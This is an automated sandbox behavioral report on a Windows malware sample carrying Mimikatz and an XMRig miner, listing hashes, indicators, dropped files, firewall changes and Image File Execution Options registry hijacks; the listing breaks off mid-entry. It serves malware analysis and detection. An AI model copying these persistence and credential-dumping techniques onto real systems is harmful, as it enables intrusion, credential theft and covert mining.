Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-12-2024 04:22
Behavioral task
behavioral1
Sample
2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe
-
Size
9.7MB
-
MD5
4661a4c89fbb89f34b2bc97f90f20a65
-
SHA1
9915b521b3d6234876d05f684f39390c319bb886
-
SHA256
6a888928a365674ffad21a3c145aff815ef7ac745107823822247aa4345405cb
-
SHA512
ea9bca7a1abca5ab01b595a860ad6366a3f546e1dce3e5191e3faf9eb56e3575588d220b2d7d0bf7a2a03277a44fdde8bd0c8a56119a9062acecc1e4f6d5b988
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4984 created 2164 4984 mgmtcbi.exe 38 -
Xmrig family
-
Contacts a large (29477) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4848-178-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-183-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-201-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-214-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-222-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-231-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-248-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-497-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-499-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-501-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-756-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig behavioral2/memory/4848-757-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/936-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/936-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023cc4-6.dat mimikatz behavioral2/memory/3092-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/224-138-0x00007FF72B7F0000-0x00007FF72B8DE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts mgmtcbi.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts mgmtcbi.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe mgmtcbi.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1140 netsh.exe 4480 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 3092 mgmtcbi.exe 4984 mgmtcbi.exe 3684 wpcap.exe 3808 liuibviiz.exe 224 vfshost.exe 1128 iyibcmiuc.exe 4848 ltbtbc.exe 2416 xohudmc.exe 3524 qigmew.exe 1228 iyibcmiuc.exe 904 iyibcmiuc.exe 1524 iyibcmiuc.exe 3516 iyibcmiuc.exe 1128 iyibcmiuc.exe 3308 iyibcmiuc.exe 3136 mgmtcbi.exe 216 iyibcmiuc.exe 3160 iyibcmiuc.exe 3708 iyibcmiuc.exe 100 iyibcmiuc.exe 876 iyibcmiuc.exe 4740 iyibcmiuc.exe 4204 iyibcmiuc.exe 4364 iyibcmiuc.exe 1832 iyibcmiuc.exe 4792 iyibcmiuc.exe 2960 btuizeiim.exe 5232 mgmtcbi.exe -
Loads dropped DLL 12 IoCs
pid Process 3684 wpcap.exe 3684 wpcap.exe 3684 wpcap.exe 3684 wpcap.exe 3684 wpcap.exe 3684 wpcap.exe 3684 wpcap.exe 3684 wpcap.exe 3684 wpcap.exe 3808 liuibviiz.exe 3808 liuibviiz.exe 3808 liuibviiz.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 65 ifconfig.me 66 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\qigmew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft mgmtcbi.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\qigmew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 mgmtcbi.exe -
resource yara_rule behavioral2/files/0x0007000000023d16-134.dat upx behavioral2/memory/224-135-0x00007FF72B7F0000-0x00007FF72B8DE000-memory.dmp upx behavioral2/memory/224-138-0x00007FF72B7F0000-0x00007FF72B8DE000-memory.dmp upx behavioral2/files/0x0007000000023d21-141.dat upx behavioral2/memory/1128-142-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/1128-146-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/files/0x0007000000023d1e-149.dat upx behavioral2/memory/4848-150-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/1228-172-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/904-176-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/4848-178-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/1524-181-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/4848-183-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/3516-186-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/1128-190-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/3308-194-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/4848-201-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/216-203-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/3160-207-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/3708-211-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/4848-214-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/100-216-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/876-220-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/4848-222-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/4740-225-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/4204-229-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/4848-231-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/4364-233-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/1832-235-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/4792-237-0x00007FF794A10000-0x00007FF794A6B000-memory.dmp upx behavioral2/memory/4848-248-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/4848-497-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/4848-499-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/4848-501-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/4848-756-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx behavioral2/memory/4848-757-0x00007FF6F5EA0000-0x00007FF6F5FC0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\jhetmctcv\UnattendGC\specials\trfo-2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\schoedcl.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\schoedcl.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\AppCapture64.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\cnli-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\spoolsrv.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\upbdrjv\swrpwe.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\trch-1.dll mgmtcbi.exe File opened for modification C:\Windows\jhetmctcv\Corporate\log.txt cmd.exe File opened for modification C:\Windows\ybemumnz\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\btuizeiim.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\exma-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\libxml2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\ucl.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\docmicfg.xml mgmtcbi.exe File created C:\Windows\ime\mgmtcbi.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\scan.bat mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\wpcap.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\vimpcsvc.exe mgmtcbi.exe File created C:\Windows\ybemumnz\docmicfg.xml mgmtcbi.exe File opened for modification C:\Windows\jhetmctcv\bctzbzczb\Packet.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\coli-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\ssleay32.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\vimpcsvc.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\mimilib.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\libeay32.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\posh-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\tucl-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\zlib1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\vfshost.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\Packet.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\svschost.exe mgmtcbi.exe File created C:\Windows\ybemumnz\vimpcsvc.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\mgmtcbi.exe 2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe File created C:\Windows\jhetmctcv\UnattendGC\schoedcl.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\xdvl-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\tibe-2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\docmicfg.exe mgmtcbi.exe File created C:\Windows\ybemumnz\svschost.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\vimpcsvc.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\schoedcl.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\spoolsrv.exe mgmtcbi.exe File created C:\Windows\ybemumnz\mgmtcbi.exe 2024-12-15_4661a4c89fbb89f34b2bc97f90f20a65_hacktools_icedid_mimikatz.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\vimpcsvc.xml mgmtcbi.exe File created C:\Windows\ybemumnz\schoedcl.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\Shellcode.ini mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\mimidrv.sys mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\ip.txt mgmtcbi.exe File opened for modification C:\Windows\jhetmctcv\bctzbzczb\Result.txt btuizeiim.exe File created C:\Windows\jhetmctcv\UnattendGC\spoolsrv.xml mgmtcbi.exe File created C:\Windows\ybemumnz\spoolsrv.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\AppCapture32.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\svschost.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\spoolsrv.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\crli-0.dll mgmtcbi.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3028 sc.exe 5020 sc.exe 3040 sc.exe 3800 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 